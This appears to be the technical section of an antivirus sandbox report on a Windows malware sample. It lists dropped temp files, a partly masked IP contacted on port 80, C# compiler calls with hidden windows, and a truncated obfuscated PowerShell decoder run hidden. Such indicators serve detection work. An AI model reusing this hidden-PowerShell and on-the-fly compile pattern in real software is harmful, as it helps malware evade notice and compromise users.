Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function z69c8 {param($l319b)$a591e='bfd6483';$t3f9b4='';for ($i=0; $i -lt $l319b.length;$i+=2){$ydbca=[convert]::ToByte($l319b.Substring($i,2),16);$t3f9b4+=[char]($ydbca ...
- %TEMP%\j4f1ekbx.0.cs
- %TEMP%\j4f1ekbx.cmdline
- %TEMP%\j4f1ekbx.out
- %TEMP%\csc2220.tmp
- %TEMP%\res2221.tmp
- %TEMP%\j4f1ekbx.dll
- %TEMP%\res2221.tmp
- %TEMP%\csc2220.tmp
- %TEMP%\j4f1ekbx.out
- %TEMP%\j4f1ekbx.dll
- %TEMP%\j4f1ekbx.pdb
- %TEMP%\j4f1ekbx.0.cs
- %TEMP%\j4f1ekbx.cmdline
- '51.##.175.221':80
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\j4f1ekbx.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES2221.tmp" "%TEMP%\CSC2220.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\j4f1ekbx.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES2221.tmp" "%TEMP%\CSC2220.tmp"